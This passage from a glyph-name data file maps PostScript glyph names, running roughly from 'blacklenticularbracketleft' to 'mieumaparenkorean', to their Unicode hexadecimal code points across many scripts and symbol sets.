blacklenticularbracketleft;3010 blacklenticularbracketleftvertical;FE3B blacklenticularbracketright;3011 blacklenticularbracketrightvertical;FE3C blacklowerlefttriangle;25E3 blacklowerrighttriangle;25E2 blackrectangle;25AC blackrightpointingpointer;25BA blackrightpointingtriangle;25B6 blacksmallsquare;25AA blacksmilingface;263B blacksquare;25A0 blackstar;2605 blackupperlefttriangle;25E4 blackupperrighttriangle;25E5 blackuppointingsmalltriangle;25B4 blackuppointingtriangle;25B2 blank;2423 blinebelow;1E07 block;2588 bmonospace;FF42 bobaimaithai;0E1A bohiragana;307C bokatakana;30DC bparen;249D bqsquare;33C3 braceex;F8F4 braceleft;007B braceleftbt;F8F3 braceleftmid;F8F2 braceleftmonospace;FF5B braceleftsmall;FE5B bracelefttp;F8F1 braceleftvertical;FE37 braceright;007D bracerightbt;F8FE bracerightmid;F8FD bracerightmonospace;FF5D bracerightsmall;FE5C bracerighttp;F8FC bracerightvertical;FE38 bracketleft;005B bracketleftbt;F8F0 bracketleftex;F8EF bracketleftmonospace;FF3B bracketlefttp;F8EE bracketright;005D bracketrightbt;F8FB bracketrightex;F8FA bracketrightmonospace;FF3D bracketrighttp;F8F9 breve;02D8 brevebelowcmb;032E brevecmb;0306 breveinvertedbelowcmb;032F breveinvertedcmb;0311 breveinverteddoublecmb;0361 bridgebelowcmb;032A bridgeinvertedbelowcmb;033A brokenbar;00A6 bstroke;0180 bsuperior;F6EA btopbar;0183 buhiragana;3076 bukatakana;30D6 bullet;2022 bulletinverse;25D8 bulletoperator;2219 bullseye;25CE c;0063 caarmenian;056E cabengali;099A cacute;0107 cadeva;091A cagujarati;0A9A cagurmukhi;0A1A calsquare;3388 candrabindubengali;0981 candrabinducmb;0310 candrabindudeva;0901 candrabindugujarati;0A81 capslock;21EA careof;2105 caron;02C7 caronbelowcmb;032C caroncmb;030C carriagereturn;21B5 cbopomofo;3118 ccaron;010D ccedilla;00E7 ccedillaacute;1E09 ccircle;24D2 ccircumflex;0109 ccurl;0255 cdot;010B cdotaccent;010B cdsquare;33C5 cedilla;00B8 cedillacmb;0327 cent;00A2 centigrade;2103 centinferior;F6DF centmonospace;FFE0 centoldstyle;F7A2 centsuperior;F6E0 chaarmenian;0579 chabengali;099B chadeva;091B chagujarati;0A9B chagurmukhi;0A1B chbopomofo;3114 cheabkhasiancyrillic;04BD checkmark;2713 checyrillic;0447 chedescenderabkhasiancyrillic;04BF chedescendercyrillic;04B7 chedieresiscyrillic;04F5 cheharmenian;0573 chekhakassiancyrillic;04CC cheverticalstrokecyrillic;04B9 chi;03C7 chieuchacirclekorean;3277 chieuchaparenkorean;3217 chieuchcirclekorean;3269 chieuchkorean;314A chieuchparenkorean;3209 chochangthai;0E0A chochanthai;0E08 chochingthai;0E09 chochoethai;0E0C chook;0188 cieucacirclekorean;3276 cieucaparenkorean;3216 cieuccirclekorean;3268 cieuckorean;3148 cieucparenkorean;3208 cieucuparenkorean;321C circle;25CB circlemultiply;2297 circleot;2299 circleplus;2295 circlepostalmark;3036 circlewithlefthalfblack;25D0 circlewithrighthalfblack;25D1 circumflex;02C6 circumflexbelowcmb;032D circumflexcmb;0302 clear;2327 clickalveolar;01C2 clickdental;01C0 clicklateral;01C1 clickretroflex;01C3 club;2663 clubsuitblack;2663 clubsuitwhite;2667 cmcubedsquare;33A4 cmonospace;FF43 cmsquaredsquare;33A0 coarmenian;0581 colon;003A colonmonetary;20A1 colonmonospace;FF1A colonsign;20A1 colonsmall;FE55 colontriangularhalfmod;02D1 colontriangularmod;02D0 comma;002C commaabovecmb;0313 commaaboverightcmb;0315 commaaccent;F6C3 commaarabic;060C commaarmenian;055D commainferior;F6E1 commamonospace;FF0C commareversedabovecmb;0314 commareversedmod;02BD commasmall;FE50 commasuperior;F6E2 commaturnedabovecmb;0312 commaturnedmod;02BB compass;263C congruent;2245 contourintegral;222E control;2303 controlACK;0006 controlBEL;0007 controlBS;0008 controlCAN;0018 controlCR;000D controlDC1;0011 controlDC2;0012 controlDC3;0013 controlDC4;0014 controlDEL;007F controlDLE;0010 controlEM;0019 controlENQ;0005 controlEOT;0004 controlESC;001B controlETB;0017 controlETX;0003 controlFF;000C controlFS;001C controlGS;001D controlHT;0009 controlLF;000A controlNAK;0015 controlRS;001E controlSI;000F controlSO;000E controlSOT;0002 controlSTX;0001 controlSUB;001A controlSYN;0016 controlUS;001F controlVT;000B copyright;00A9 copyrightsans;F8E9 copyrightserif;F6D9 cornerbracketleft;300C cornerbracketlefthalfwidth;FF62 cornerbracketleftvertical;FE41 cornerbracketright;300D cornerbracketrighthalfwidth;FF63 cornerbracketrightvertical;FE42 corporationsquare;337F cosquare;33C7 coverkgsquare;33C6 cparen;249E cruzeiro;20A2 cstretched;0297 curlyand;22CF curlyor;22CE currency;00A4 cyrBreve;F6D1 cyrFlex;F6D2 cyrbreve;F6D4 cyrflex;F6D5 d;0064 daarmenian;0564 dabengali;09A6 dadarabic;0636 dadeva;0926 dadfinalarabic;FEBE dadinitialarabic;FEBF dadmedialarabic;FEC0 dagesh;05BC dageshhebrew;05BC dagger;2020 daggerdbl;2021 dagujarati;0AA6 dagurmukhi;0A26 dahiragana;3060 dakatakana;30C0 dalarabic;062F dalet;05D3 daletdagesh;FB33 daletdageshhebrew;FB33 dalethatafpatah;05D3 05B2 dalethatafpatahhebrew;05D3 05B2 dalethatafsegol;05D3 05B1 dalethatafsegolhebrew;05D3 05B1 dalethebrew;05D3 dalethiriq;05D3 05B4 dalethiriqhebrew;05D3 05B4 daletholam;05D3 05B9 daletholamhebrew;05D3 05B9 daletpatah;05D3 05B7 daletpatahhebrew;05D3 05B7 daletqamats;05D3 05B8 daletqamatshebrew;05D3 05B8 daletqubuts;05D3 05BB daletqubutshebrew;05D3 05BB daletsegol;05D3 05B6 daletsegolhebrew;05D3 05B6 daletsheva;05D3 05B0 daletshevahebrew;05D3 05B0 dalettsere;05D3 05B5 dalettserehebrew;05D3 05B5 dalfinalarabic;FEAA dammaarabic;064F dammalowarabic;064F dammatanaltonearabic;064C dammatanarabic;064C danda;0964 dargahebrew;05A7 dargalefthebrew;05A7 dasiapneumatacyrilliccmb;0485 dblGrave;F6D3 dblanglebracketleft;300A dblanglebracketleftvertical;FE3D dblanglebracketright;300B dblanglebracketrightvertical;FE3E dblarchinvertedbelowcmb;032B dblarrowleft;21D4 dblarrowright;21D2 dbldanda;0965 dblgrave;F6D6 dblgravecmb;030F dblintegral;222C dbllowline;2017 dbllowlinecmb;0333 dbloverlinecmb;033F dblprimemod;02BA dblverticalbar;2016 dblverticallineabovecmb;030E dbopomofo;3109 dbsquare;33C8 dcaron;010F dcedilla;1E11 dcircle;24D3 dcircumflexbelow;1E13 dcroat;0111 ddabengali;09A1 ddadeva;0921 ddagujarati;0AA1 ddagurmukhi;0A21 ddalarabic;0688 ddalfinalarabic;FB89 dddhadeva;095C ddhabengali;09A2 ddhadeva;0922 ddhagujarati;0AA2 ddhagurmukhi;0A22 ddotaccent;1E0B ddotbelow;1E0D decimalseparatorarabic;066B decimalseparatorpersian;066B decyrillic;0434 degree;00B0 dehihebrew;05AD dehiragana;3067 deicoptic;03EF dekatakana;30C7 deleteleft;232B deleteright;2326 delta;03B4 deltaturned;018D denominatorminusonenumeratorbengali;09F8 dezh;02A4 dhabengali;09A7 dhadeva;0927 dhagujarati;0AA7 dhagurmukhi;0A27 dhook;0257 dialytikatonos;0385 dialytikatonoscmb;0344 diamond;2666 diamondsuitwhite;2662 dieresis;00A8 dieresisacute;F6D7 dieresisbelowcmb;0324 dieresiscmb;0308 dieresisgrave;F6D8 dieresistonos;0385 dihiragana;3062 dikatakana;30C2 dittomark;3003 divide;00F7 divides;2223 divisionslash;2215 djecyrillic;0452 dkshade;2593 dlinebelow;1E0F dlsquare;3397 dmacron;0111 dmonospace;FF44 dnblock;2584 dochadathai;0E0E dodekthai;0E14 dohiragana;3069 dokatakana;30C9 dollar;0024 dollarinferior;F6E3 dollarmonospace;FF04 dollaroldstyle;F724 dollarsmall;FE69 dollarsuperior;F6E4 dong;20AB dorusquare;3326 dotaccent;02D9 dotaccentcmb;0307 dotbelowcmb;0323 dotbelowcomb;0323 dotkatakana;30FB dotlessi;0131 dotlessj;F6BE dotlessjstrokehook;0284 dotmath;22C5 dottedcircle;25CC doubleyodpatah;FB1F doubleyodpatahhebrew;FB1F downtackbelowcmb;031E downtackmod;02D5 dparen;249F dsuperior;F6EB dtail;0256 dtopbar;018C duhiragana;3065 dukatakana;30C5 dz;01F3 dzaltone;02A3 dzcaron;01C6 dzcurl;02A5 dzeabkhasiancyrillic;04E1 dzecyrillic;0455 dzhecyrillic;045F e;0065 eacute;00E9 earth;2641 ebengali;098F ebopomofo;311C ebreve;0115 ecandradeva;090D ecandragujarati;0A8D ecandravowelsigndeva;0945 ecandravowelsigngujarati;0AC5 ecaron;011B ecedillabreve;1E1D echarmenian;0565 echyiwnarmenian;0587 ecircle;24D4 ecircumflex;00EA ecircumflexacute;1EBF ecircumflexbelow;1E19 ecircumflexdotbelow;1EC7 ecircumflexgrave;1EC1 ecircumflexhookabove;1EC3 ecircumflextilde;1EC5 ecyrillic;0454 edblgrave;0205 edeva;090F edieresis;00EB edot;0117 edotaccent;0117 edotbelow;1EB9 eegurmukhi;0A0F eematragurmukhi;0A47 efcyrillic;0444 egrave;00E8 egujarati;0A8F eharmenian;0567 ehbopomofo;311D ehiragana;3048 ehookabove;1EBB eibopomofo;311F eight;0038 eightarabic;0668 eightbengali;09EE eightcircle;2467 eightcircleinversesansserif;2791 eightdeva;096E eighteencircle;2471 eighteenparen;2485 eighteenperiod;2499 eightgujarati;0AEE eightgurmukhi;0A6E eighthackarabic;0668 eighthangzhou;3028 eighthnotebeamed;266B eightideographicparen;3227 eightinferior;2088 eightmonospace;FF18 eightoldstyle;F738 eightparen;247B eightperiod;248F eightpersian;06F8 eightroman;2177 eightsuperior;2078 eightthai;0E58 einvertedbreve;0207 eiotifiedcyrillic;0465 ekatakana;30A8 ekatakanahalfwidth;FF74 ekonkargurmukhi;0A74 ekorean;3154 elcyrillic;043B element;2208 elevencircle;246A elevenparen;247E elevenperiod;2492 elevenroman;217A ellipsis;2026 ellipsisvertical;22EE emacron;0113 emacronacute;1E17 emacrongrave;1E15 emcyrillic;043C emdash;2014 emdashvertical;FE31 emonospace;FF45 emphasismarkarmenian;055B emptyset;2205 enbopomofo;3123 encyrillic;043D endash;2013 endashvertical;FE32 endescendercyrillic;04A3 eng;014B engbopomofo;3125 enghecyrillic;04A5 enhookcyrillic;04C8 enspace;2002 eogonek;0119 eokorean;3153 eopen;025B eopenclosed;029A eopenreversed;025C eopenreversedclosed;025E eopenreversedhook;025D eparen;24A0 epsilon;03B5 epsilontonos;03AD equal;003D equalmonospace;FF1D equalsmall;FE66 equalsuperior;207C equivalence;2261 erbopomofo;3126 ercyrillic;0440 ereversed;0258 ereversedcyrillic;044D escyrillic;0441 esdescendercyrillic;04AB esh;0283 eshcurl;0286 eshortdeva;090E eshortvowelsigndeva;0946 eshreversedloop;01AA eshsquatreversed;0285 esmallhiragana;3047 esmallkatakana;30A7 esmallkatakanahalfwidth;FF6A estimated;212E esuperior;F6EC eta;03B7 etarmenian;0568 etatonos;03AE eth;00F0 etilde;1EBD etildebelow;1E1B etnahtafoukhhebrew;0591 etnahtafoukhlefthebrew;0591 etnahtahebrew;0591 etnahtalefthebrew;0591 eturned;01DD eukorean;3161 euro;20AC evowelsignbengali;09C7 evowelsigndeva;0947 evowelsigngujarati;0AC7 exclam;0021 exclamarmenian;055C exclamdbl;203C exclamdown;00A1 exclamdownsmall;F7A1 exclammonospace;FF01 exclamsmall;F721 existential;2203 ezh;0292 ezhcaron;01EF ezhcurl;0293 ezhreversed;01B9 ezhtail;01BA f;0066 fadeva;095E fagurmukhi;0A5E fahrenheit;2109 fathaarabic;064E fathalowarabic;064E fathatanarabic;064B fbopomofo;3108 fcircle;24D5 fdotaccent;1E1F feharabic;0641 feharmenian;0586 fehfinalarabic;FED2 fehinitialarabic;FED3 fehmedialarabic;FED4 feicoptic;03E5 female;2640 ff;FB00 ffi;FB03 ffl;FB04 fi;FB01 fifteencircle;246E fifteenparen;2482 fifteenperiod;2496 figuredash;2012 filledbox;25A0 filledrect;25AC finalkaf;05DA finalkafdagesh;FB3A finalkafdageshhebrew;FB3A finalkafhebrew;05DA finalkafqamats;05DA 05B8 finalkafqamatshebrew;05DA 05B8 finalkafsheva;05DA 05B0 finalkafshevahebrew;05DA 05B0 finalmem;05DD finalmemhebrew;05DD finalnun;05DF finalnunhebrew;05DF finalpe;05E3 finalpehebrew;05E3 finaltsadi;05E5 finaltsadihebrew;05E5 firsttonechinese;02C9 fisheye;25C9 fitacyrillic;0473 five;0035 fivearabic;0665 fivebengali;09EB fivecircle;2464 fivecircleinversesansserif;278E fivedeva;096B fiveeighths;215D fivegujarati;0AEB fivegurmukhi;0A6B fivehackarabic;0665 fivehangzhou;3025 fiveideographicparen;3224 fiveinferior;2085 fivemonospace;FF15 fiveoldstyle;F735 fiveparen;2478 fiveperiod;248C fivepersian;06F5 fiveroman;2174 fivesuperior;2075 fivethai;0E55 fl;FB02 florin;0192 fmonospace;FF46 fmsquare;3399 fofanthai;0E1F fofathai;0E1D fongmanthai;0E4F forall;2200 four;0034 fourarabic;0664 fourbengali;09EA fourcircle;2463 fourcircleinversesansserif;278D fourdeva;096A fourgujarati;0AEA fourgurmukhi;0A6A fourhackarabic;0664 fourhangzhou;3024 fourideographicparen;3223 fourinferior;2084 fourmonospace;FF14 fournumeratorbengali;09F7 fouroldstyle;F734 fourparen;2477 fourperiod;248B fourpersian;06F4 fourroman;2173 foursuperior;2074 fourteencircle;246D fourteenparen;2481 fourteenperiod;2495 fourthai;0E54 fourthtonechinese;02CB fparen;24A1 fraction;2044 franc;20A3 g;0067 gabengali;0997 gacute;01F5 gadeva;0917 gafarabic;06AF gaffinalarabic;FB93 gafinitialarabic;FB94 gafmedialarabic;FB95 gagujarati;0A97 gagurmukhi;0A17 gahiragana;304C gakatakana;30AC gamma;03B3 gammalatinsmall;0263 gammasuperior;02E0 gangiacoptic;03EB gbopomofo;310D gbreve;011F gcaron;01E7 gcedilla;0123 gcircle;24D6 gcircumflex;011D gcommaaccent;0123 gdot;0121 gdotaccent;0121 gecyrillic;0433 gehiragana;3052 gekatakana;30B2 geometricallyequal;2251 gereshaccenthebrew;059C gereshhebrew;05F3 gereshmuqdamhebrew;059D germandbls;00DF gershayimaccenthebrew;059E gershayimhebrew;05F4 getamark;3013 ghabengali;0998 ghadarmenian;0572 ghadeva;0918 ghagujarati;0A98 ghagurmukhi;0A18 ghainarabic;063A ghainfinalarabic;FECE ghaininitialarabic;FECF ghainmedialarabic;FED0 ghemiddlehookcyrillic;0495 ghestrokecyrillic;0493 gheupturncyrillic;0491 ghhadeva;095A ghhagurmukhi;0A5A ghook;0260 ghzsquare;3393 gihiragana;304E gikatakana;30AE gimarmenian;0563 gimel;05D2 gimeldagesh;FB32 gimeldageshhebrew;FB32 gimelhebrew;05D2 gjecyrillic;0453 glottalinvertedstroke;01BE glottalstop;0294 glottalstopinverted;0296 glottalstopmod;02C0 glottalstopreversed;0295 glottalstopreversedmod;02C1 glottalstopreversedsuperior;02E4 glottalstopstroke;02A1 glottalstopstrokereversed;02A2 gmacron;1E21 gmonospace;FF47 gohiragana;3054 gokatakana;30B4 gparen;24A2 gpasquare;33AC gradient;2207 grave;0060 gravebelowcmb;0316 gravecmb;0300 gravecomb;0300 gravedeva;0953 gravelowmod;02CE gravemonospace;FF40 gravetonecmb;0340 greater;003E greaterequal;2265 greaterequalorless;22DB greatermonospace;FF1E greaterorequivalent;2273 greaterorless;2277 greateroverequal;2267 greatersmall;FE65 gscript;0261 gstroke;01E5 guhiragana;3050 guillemotleft;00AB guillemotright;00BB guilsinglleft;2039 guilsinglright;203A gukatakana;30B0 guramusquare;3318 gysquare;33C9 h;0068 haabkhasiancyrillic;04A9 haaltonearabic;06C1 habengali;09B9 hadescendercyrillic;04B3 hadeva;0939 hagujarati;0AB9 hagurmukhi;0A39 haharabic;062D hahfinalarabic;FEA2 hahinitialarabic;FEA3 hahiragana;306F hahmedialarabic;FEA4 haitusquare;332A hakatakana;30CF hakatakanahalfwidth;FF8A halantgurmukhi;0A4D hamzaarabic;0621 hamzadammaarabic;0621 064F hamzadammatanarabic;0621 064C hamzafathaarabic;0621 064E hamzafathatanarabic;0621 064B hamzalowarabic;0621 hamzalowkasraarabic;0621 0650 hamzalowkasratanarabic;0621 064D hamzasukunarabic;0621 0652 hangulfiller;3164 hardsigncyrillic;044A harpoonleftbarbup;21BC harpoonrightbarbup;21C0 hasquare;33CA hatafpatah;05B2 hatafpatah16;05B2 hatafpatah23;05B2 hatafpatah2f;05B2 hatafpatahhebrew;05B2 hatafpatahnarrowhebrew;05B2 hatafpatahquarterhebrew;05B2 hatafpatahwidehebrew;05B2 hatafqamats;05B3 hatafqamats1b;05B3 hatafqamats28;05B3 hatafqamats34;05B3 hatafqamatshebrew;05B3 hatafqamatsnarrowhebrew;05B3 hatafqamatsquarterhebrew;05B3 hatafqamatswidehebrew;05B3 hatafsegol;05B1 hatafsegol17;05B1 hatafsegol24;05B1 hatafsegol30;05B1 hatafsegolhebrew;05B1 hatafsegolnarrowhebrew;05B1 hatafsegolquarterhebrew;05B1 hatafsegolwidehebrew;05B1 hbar;0127 hbopomofo;310F hbrevebelow;1E2B hcedilla;1E29 hcircle;24D7 hcircumflex;0125 hdieresis;1E27 hdotaccent;1E23 hdotbelow;1E25 he;05D4 heart;2665 heartsuitblack;2665 heartsuitwhite;2661 hedagesh;FB34 hedageshhebrew;FB34 hehaltonearabic;06C1 heharabic;0647 hehebrew;05D4 hehfinalaltonearabic;FBA7 hehfinalalttwoarabic;FEEA hehfinalarabic;FEEA hehhamzaabovefinalarabic;FBA5 hehhamzaaboveisolatedarabic;FBA4 hehinitialaltonearabic;FBA8 hehinitialarabic;FEEB hehiragana;3078 hehmedialaltonearabic;FBA9 hehmedialarabic;FEEC heiseierasquare;337B hekatakana;30D8 hekatakanahalfwidth;FF8D hekutaarusquare;3336 henghook;0267 herutusquare;3339 het;05D7 hethebrew;05D7 hhook;0266 hhooksuperior;02B1 hieuhacirclekorean;327B hieuhaparenkorean;321B hieuhcirclekorean;326D hieuhkorean;314E hieuhparenkorean;320D hihiragana;3072 hikatakana;30D2 hikatakanahalfwidth;FF8B hiriq;05B4 hiriq14;05B4 hiriq21;05B4 hiriq2d;05B4 hiriqhebrew;05B4 hiriqnarrowhebrew;05B4 hiriqquarterhebrew;05B4 hiriqwidehebrew;05B4 hlinebelow;1E96 hmonospace;FF48 hoarmenian;0570 hohipthai;0E2B hohiragana;307B hokatakana;30DB hokatakanahalfwidth;FF8E holam;05B9 holam19;05B9 holam26;05B9 holam32;05B9 holamhebrew;05B9 holamnarrowhebrew;05B9 holamquarterhebrew;05B9 holamwidehebrew;05B9 honokhukthai;0E2E hookabovecomb;0309 hookcmb;0309 hookpalatalizedbelowcmb;0321 hookretroflexbelowcmb;0322 hoonsquare;3342 horicoptic;03E9 horizontalbar;2015 horncmb;031B hotsprings;2668 house;2302 hparen;24A3 hsuperior;02B0 hturned;0265 huhiragana;3075 huiitosquare;3333 hukatakana;30D5 hukatakanahalfwidth;FF8C hungarumlaut;02DD hungarumlautcmb;030B hv;0195 hyphen;002D hypheninferior;F6E5 hyphenmonospace;FF0D hyphensmall;FE63 hyphensuperior;F6E6 hyphentwo;2010 i;0069 iacute;00ED iacyrillic;044F ibengali;0987 ibopomofo;3127 ibreve;012D icaron;01D0 icircle;24D8 icircumflex;00EE icyrillic;0456 idblgrave;0209 ideographearthcircle;328F ideographfirecircle;328B ideographicallianceparen;323F ideographiccallparen;323A ideographiccentrecircle;32A5 ideographicclose;3006 ideographiccomma;3001 ideographiccommaleft;FF64 ideographiccongratulationparen;3237 ideographiccorrectcircle;32A3 ideographicearthparen;322F ideographicenterpriseparen;323D ideographicexcellentcircle;329D ideographicfestivalparen;3240 ideographicfinancialcircle;3296 ideographicfinancialparen;3236 ideographicfireparen;322B ideographichaveparen;3232 ideographichighcircle;32A4 ideographiciterationmark;3005 ideographiclaborcircle;3298 ideographiclaborparen;3238 ideographicleftcircle;32A7 ideographiclowcircle;32A6 ideographicmedicinecircle;32A9 ideographicmetalparen;322E ideographicmoonparen;322A ideographicnameparen;3234 ideographicperiod;3002 ideographicprintcircle;329E ideographicreachparen;3243 ideographicrepresentparen;3239 ideographicresourceparen;323E ideographicrightcircle;32A8 ideographicsecretcircle;3299 ideographicselfparen;3242 ideographicsocietyparen;3233 ideographicspace;3000 ideographicspecialparen;3235 ideographicstockparen;3231 ideographicstudyparen;323B ideographicsunparen;3230 ideographicsuperviseparen;323C ideographicwaterparen;322C ideographicwoodparen;322D ideographiczero;3007 ideographmetalcircle;328E ideographmooncircle;328A ideographnamecircle;3294 ideographsuncircle;3290 ideographwatercircle;328C ideographwoodcircle;328D ideva;0907 idieresis;00EF idieresisacute;1E2F idieresiscyrillic;04E5 idotbelow;1ECB iebrevecyrillic;04D7 iecyrillic;0435 ieungacirclekorean;3275 ieungaparenkorean;3215 ieungcirclekorean;3267 ieungkorean;3147 ieungparenkorean;3207 igrave;00EC igujarati;0A87 igurmukhi;0A07 ihiragana;3044 ihookabove;1EC9 iibengali;0988 iicyrillic;0438 iideva;0908 iigujarati;0A88 iigurmukhi;0A08 iimatragurmukhi;0A40 iinvertedbreve;020B iishortcyrillic;0439 iivowelsignbengali;09C0 iivowelsigndeva;0940 iivowelsigngujarati;0AC0 ij;0133 ikatakana;30A4 ikatakanahalfwidth;FF72 ikorean;3163 ilde;02DC iluyhebrew;05AC imacron;012B imacroncyrillic;04E3 imageorapproximatelyequal;2253 imatragurmukhi;0A3F imonospace;FF49 increment;2206 infinity;221E iniarmenian;056B integral;222B integralbottom;2321 integralbt;2321 integralex;F8F5 integraltop;2320 integraltp;2320 intersection;2229 intisquare;3305 invbullet;25D8 invcircle;25D9 invsmileface;263B iocyrillic;0451 iogonek;012F iota;03B9 iotadieresis;03CA iotadieresistonos;0390 iotalatin;0269 iotatonos;03AF iparen;24A4 irigurmukhi;0A72 ismallhiragana;3043 ismallkatakana;30A3 ismallkatakanahalfwidth;FF68 issharbengali;09FA istroke;0268 isuperior;F6ED iterationhiragana;309D iterationkatakana;30FD itilde;0129 itildebelow;1E2D iubopomofo;3129 iucyrillic;044E ivowelsignbengali;09BF ivowelsigndeva;093F ivowelsigngujarati;0ABF izhitsacyrillic;0475 izhitsadblgravecyrillic;0477 j;006A jaarmenian;0571 jabengali;099C jadeva;091C jagujarati;0A9C jagurmukhi;0A1C jbopomofo;3110 jcaron;01F0 jcircle;24D9 jcircumflex;0135 jcrossedtail;029D jdotlessstroke;025F jecyrillic;0458 jeemarabic;062C jeemfinalarabic;FE9E jeeminitialarabic;FE9F jeemmedialarabic;FEA0 jeharabic;0698 jehfinalarabic;FB8B jhabengali;099D jhadeva;091D jhagujarati;0A9D jhagurmukhi;0A1D jheharmenian;057B jis;3004 jmonospace;FF4A jparen;24A5 jsuperior;02B2 k;006B kabashkircyrillic;04A1 kabengali;0995 kacute;1E31 kacyrillic;043A kadescendercyrillic;049B kadeva;0915 kaf;05DB kafarabic;0643 kafdagesh;FB3B kafdageshhebrew;FB3B kaffinalarabic;FEDA kafhebrew;05DB kafinitialarabic;FEDB kafmedialarabic;FEDC kafrafehebrew;FB4D kagujarati;0A95 kagurmukhi;0A15 kahiragana;304B kahookcyrillic;04C4 kakatakana;30AB kakatakanahalfwidth;FF76 kappa;03BA kappasymbolgreek;03F0 kapyeounmieumkorean;3171 kapyeounphieuphkorean;3184 kapyeounpieupkorean;3178 kapyeounssangpieupkorean;3179 karoriisquare;330D kashidaautoarabic;0640 kashidaautonosidebearingarabic;0640 kasmallkatakana;30F5 kasquare;3384 kasraarabic;0650 kasratanarabic;064D kastrokecyrillic;049F katahiraprolongmarkhalfwidth;FF70 kaverticalstrokecyrillic;049D kbopomofo;310E kcalsquare;3389 kcaron;01E9 kcedilla;0137 kcircle;24DA kcommaaccent;0137 kdotbelow;1E33 keharmenian;0584 kehiragana;3051 kekatakana;30B1 kekatakanahalfwidth;FF79 kenarmenian;056F kesmallkatakana;30F6 kgreenlandic;0138 khabengali;0996 khacyrillic;0445 khadeva;0916 khagujarati;0A96 khagurmukhi;0A16 khaharabic;062E khahfinalarabic;FEA6 khahinitialarabic;FEA7 khahmedialarabic;FEA8 kheicoptic;03E7 khhadeva;0959 khhagurmukhi;0A59 khieukhacirclekorean;3278 khieukhaparenkorean;3218 khieukhcirclekorean;326A khieukhkorean;314B khieukhparenkorean;320A khokhaithai;0E02 khokhonthai;0E05 khokhuatthai;0E03 khokhwaithai;0E04 khomutthai;0E5B khook;0199 khorakhangthai;0E06 khzsquare;3391 kihiragana;304D kikatakana;30AD kikatakanahalfwidth;FF77 kiroguramusquare;3315 kiromeetorusquare;3316 kirosquare;3314 kiyeokacirclekorean;326E kiyeokaparenkorean;320E kiyeokcirclekorean;3260 kiyeokkorean;3131 kiyeokparenkorean;3200 kiyeoksioskorean;3133 kjecyrillic;045C klinebelow;1E35 klsquare;3398 kmcubedsquare;33A6 kmonospace;FF4B kmsquaredsquare;33A2 kohiragana;3053 kohmsquare;33C0 kokaithai;0E01 kokatakana;30B3 kokatakanahalfwidth;FF7A kooposquare;331E koppacyrillic;0481 koreanstandardsymbol;327F koroniscmb;0343 kparen;24A6 kpasquare;33AA ksicyrillic;046F ktsquare;33CF kturned;029E kuhiragana;304F kukatakana;30AF kukatakanahalfwidth;FF78 kvsquare;33B8 kwsquare;33BE l;006C labengali;09B2 lacute;013A ladeva;0932 lagujarati;0AB2 lagurmukhi;0A32 lakkhangyaothai;0E45 lamaleffinalarabic;FEFC lamalefhamzaabovefinalarabic;FEF8 lamalefhamzaaboveisolatedarabic;FEF7 lamalefhamzabelowfinalarabic;FEFA lamalefhamzabelowisolatedarabic;FEF9 lamalefisolatedarabic;FEFB lamalefmaddaabovefinalarabic;FEF6 lamalefmaddaaboveisolatedarabic;FEF5 lamarabic;0644 lambda;03BB lambdastroke;019B lamed;05DC lameddagesh;FB3C lameddageshhebrew;FB3C lamedhebrew;05DC lamedholam;05DC 05B9 lamedholamdagesh;05DC 05B9 05BC lamedholamdageshhebrew;05DC 05B9 05BC lamedholamhebrew;05DC 05B9 lamfinalarabic;FEDE lamhahinitialarabic;FCCA laminitialarabic;FEDF lamjeeminitialarabic;FCC9 lamkhahinitialarabic;FCCB lamlamhehisolatedarabic;FDF2 lammedialarabic;FEE0 lammeemhahinitialarabic;FD88 lammeeminitialarabic;FCCC lammeemjeeminitialarabic;FEDF FEE4 FEA0 lammeemkhahinitialarabic;FEDF FEE4 FEA8 largecircle;25EF lbar;019A lbelt;026C lbopomofo;310C lcaron;013E lcedilla;013C lcircle;24DB lcircumflexbelow;1E3D lcommaaccent;013C ldot;0140 ldotaccent;0140 ldotbelow;1E37 ldotbelowmacron;1E39 leftangleabovecmb;031A lefttackbelowcmb;0318 less;003C lessequal;2264 lessequalorgreater;22DA lessmonospace;FF1C lessorequivalent;2272 lessorgreater;2276 lessoverequal;2266 lesssmall;FE64 lezh;026E lfblock;258C lhookretroflex;026D lira;20A4 liwnarmenian;056C lj;01C9 ljecyrillic;0459 ll;F6C0 lladeva;0933 llagujarati;0AB3 llinebelow;1E3B llladeva;0934 llvocalicbengali;09E1 llvocalicdeva;0961 llvocalicvowelsignbengali;09E3 llvocalicvowelsigndeva;0963 lmiddletilde;026B lmonospace;FF4C lmsquare;33D0 lochulathai;0E2C logicaland;2227 logicalnot;00AC logicalnotreversed;2310 logicalor;2228 lolingthai;0E25 longs;017F lowlinecenterline;FE4E lowlinecmb;0332 lowlinedashed;FE4D lozenge;25CA lparen;24A7 lslash;0142 lsquare;2113 lsuperior;F6EE ltshade;2591 luthai;0E26 lvocalicbengali;098C lvocalicdeva;090C lvocalicvowelsignbengali;09E2 lvocalicvowelsigndeva;0962 lxsquare;33D3 m;006D mabengali;09AE macron;00AF macronbelowcmb;0331 macroncmb;0304 macronlowmod;02CD macronmonospace;FFE3 macute;1E3F madeva;092E magujarati;0AAE magurmukhi;0A2E mahapakhhebrew;05A4 mahapakhlefthebrew;05A4 mahiragana;307E maichattawalowleftthai;F895 maichattawalowrightthai;F894 maichattawathai;0E4B maichattawaupperleftthai;F893 maieklowleftthai;F88C maieklowrightthai;F88B maiekthai;0E48 maiekupperleftthai;F88A maihanakatleftthai;F884 maihanakatthai;0E31 maitaikhuleftthai;F889 maitaikhuthai;0E47 maitholowleftthai;F88F maitholowrightthai;F88E maithothai;0E49 maithoupperleftthai;F88D maitrilowleftthai;F892 maitrilowrightthai;F891 maitrithai;0E4A maitriupperleftthai;F890 maiyamokthai;0E46 makatakana;30DE makatakanahalfwidth;FF8F male;2642 mansyonsquare;3347 maqafhebrew;05BE mars;2642 masoracirclehebrew;05AF masquare;3383 mbopomofo;3107 mbsquare;33D4 mcircle;24DC mcubedsquare;33A5 mdotaccent;1E41 mdotbelow;1E43 meemarabic;0645 meemfinalarabic;FEE2 meeminitialarabic;FEE3 meemmedialarabic;FEE4 meemmeeminitialarabic;FCD1 meemmeemisolatedarabic;FC48 meetorusquare;334D mehiragana;3081 meizierasquare;337E mekatakana;30E1 mekatakanahalfwidth;FF92 mem;05DE memdagesh;FB3E memdageshhebrew;FB3E memhebrew;05DE menarmenian;0574 merkhahebrew;05A5 merkhakefulahebrew;05A6 merkhakefulalefthebrew;05A6 merkhalefthebrew;05A5 mhook;0271 mhzsquare;3392 middledotkatakanahalfwidth;FF65 middot;00B7 mieumacirclekorean;3272 mieumaparenkorean;3212 